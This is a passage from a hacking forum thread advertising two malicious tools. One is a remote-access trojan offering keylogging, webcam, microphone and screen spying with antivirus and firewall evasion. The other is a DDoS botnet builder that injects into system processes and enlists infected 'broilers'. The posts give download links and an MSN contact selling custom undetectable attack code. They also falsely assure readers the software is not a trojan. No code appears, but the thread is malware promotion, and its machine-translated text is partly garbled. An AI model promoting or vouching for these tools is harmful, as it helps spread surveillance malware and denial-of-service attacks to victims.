Jump to content
finlay

MS-DRT Trojan RAT 2.2

Recommended Posts

MS-DRT Trojan RAT

The new concept of remote control software architecture, including

domestic and international, some excellent use of architectural

concepts. Entirely through the firewall and a variety of security

software. And support for reverse connections, do not need to know the

server's IP address of the remote management that can be used to

achieve a variety of network environments. Without a back door server

program, the algorithm in all the world's leading encrypted data

transmission, to ensure maximum security of the server computer.

Convenience of a full-featured remote control allows you to fully enjoy

the fun of document management.

?1? File Management

?2? screen monitors

?3? key logger

?4? System Management

?5? session management

?6? Video Surveillance

?7? voice monitoring

?8? EXE plug-in

?9? 3389 pairs of open -

?10? Agent Function

?11? port mapping

?12? perfect support for Unicode

?13? to add API Search Engine

?14? through LAN proxy

?15? export public network IP list

?16? cluster control

Low-power monitoring capabilities, allows you to ease operation

Software with the screen monitor and camera monitoring capabilities,

the use of this feature to the computer's configuration requirements is

not high. Network transmission are high compression ratio of

compression algorithms. Makes the network data packet transmission

optimization to further improve overall performance and controllable.

The control client will automatically clean up the memory, will take up

memory space without the need for time to release and clear, so that

program memory

DanisH

Download

MS-DRT Trojan-?? HOME

Link to comment
Share on other sites

MS_Zombie Attack DDOS Introduction:

n this is a Denial of Service DDOS stress testing software MSN_Zombie

attack DDOS)

etwork traffic control and system control technology costs, speed, do

not plug, hidden, and powerful attacks, such as outstanding performance

characteristics, can fully exploit the weaknesses of the target

audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be

protective. The protection of corporate Web site or host security.

Strong performance of the attack

Support for custom packet TCP / UDP attack to attack in support of

conventional host, such as multiple TCP connections / UDP floods at /

ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP

and more connected / HTTP download / FTP multi-connection / FTP

download / CC attacks in support of win98/2k/xp/xp-sp2/vista system.

Automatic on-line chickens

A variety of ways to support the on-line mechanism for the broilers,

such as Dynamic Domain Name / URL steering / FTP upload documents IP /

fixed IP and so on, through a simple configuration can be automatically

generated on the server. Server has powerful features automatic re-

connection will be able to automatically search for hosts outside the

network address, the automatic use of agents, to support the LAN

control, never dropped.

Hidden performance

Encryptionthe protection of client services can be injected into any

process, such as explorer, svchost, etc., NT system service can be

generated automatically activated disguised.

First-class attack speed

Server-side part of the code directly from the completion of the

compilation, in order to protect as much as possible at the same time

functional compact, perfect attack speed by optimizing the speed and

thread, to enhance the capacity of the best attack

Welcome to the forum: ºÚ¾ÖºÚ¿ÍÂÛ̳-ºÚ¿Í¼¼Êõ:¼¼ÊõÌÖÂÛ,Éø͸,©¶´,ºÚ¿ÍÈí¼þ,ºÚ¿Í»ùµØ - Powered by Discuz!

2.jpg

Sorry for my poor english

Download Address:

http://www.hackju.cn/msn.rar

Hello, can be customized professional business version of DDOS attack

code written by an independent anti-virus software can not be killed

but also a more formidable power ..... super cheap price of more

powerful than others are discount software cheap attacks.

Contact my MSN: hackxf@live.cn Thank you!

MS-DDOS attack latest version of an increase of remote file management.

Video surveillance. Screen monitor. Advanced features such as remote

shell ...

The intensity of attacks is a free version of the 3-fold, and

supports 16 kinds of super-network attacks

by Details please visit: http://www.hackju.cn/msn.htm

As a result of the use of too many people, it has been their anti-virus

software as Trojan horse killing,

So this is normal, not the back door or Trojan horse program, please

rest assured that use.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...